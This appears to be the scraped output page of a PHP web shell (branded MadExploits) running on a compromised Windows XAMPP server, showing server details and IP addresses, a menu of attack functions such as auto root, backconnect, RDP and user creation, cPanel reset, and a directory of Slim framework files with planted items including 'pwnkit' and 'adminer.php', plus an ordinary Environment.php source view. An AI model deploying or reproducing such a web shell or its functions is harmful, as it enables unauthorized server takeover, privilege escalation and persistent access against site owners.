Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.51
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
phpMyAdmin /
vendor /
slim /
psr7 /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
Factory
[ DIR ]
drwxrwxrwx
Interfaces
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
Cookies.php
5.27
KB
-rw-rw-rw-
Environment.php
1.51
KB
-rw-rw-rw-
Header.php
1.9
KB
-rw-rw-rw-
Headers.php
8.68
KB
-rw-rw-rw-
Message.php
3.8
KB
-rw-rw-rw-
NonBufferedBody.php
2.45
KB
-rw-rw-rw-
Request.php
8.38
KB
-rw-rw-rw-
Response.php
8.5
KB
-rw-rw-rw-
Stream.php
8.98
KB
-rw-rw-rw-
UploadedFile.php
8.34
KB
-rw-rw-rw-
Uri.php
11.22
KB
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Environment.php
<?php /** * Slim Framework (https://slimframework.com) * * @license https://github.com/slimphp/Slim-Psr7/blob/master/LICENSE.md (MIT License) */ declare(strict_types=1); namespace Slim\Psr7; use function array_merge; use function microtime; use function time; class Environment { /** * @param array $data Array of custom environment keys and values * * @return array */ public static function mock(array $data = []): array { if ( (isset($data['HTTPS']) && $data['HTTPS'] !== 'off') || ((isset($data['REQUEST_SCHEME']) && $data['REQUEST_SCHEME'] === 'https')) ) { $scheme = 'https'; $port = 443; } else { $scheme = 'http'; $port = 80; } return array_merge([ 'HTTP_ACCEPT' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'HTTP_ACCEPT_CHARSET' => 'ISO-8859-1,utf-8;q=0.7,*;q=0.3', 'HTTP_ACCEPT_LANGUAGE' => 'en-US,en;q=0.8', 'HTTP_USER_AGENT' => 'Slim Framework', 'QUERY_STRING' => '', 'REMOTE_ADDR' => '127.0.0.1', 'REQUEST_METHOD' => 'GET', 'REQUEST_SCHEME' => $scheme, 'REQUEST_TIME' => time(), 'REQUEST_TIME_FLOAT' => microtime(true), 'REQUEST_URI' => '', 'SCRIPT_NAME' => '', 'SERVER_NAME' => 'localhost', 'SERVER_PORT' => $port, 'SERVER_PROTOCOL' => 'HTTP/1.1', ], $data); } }
Close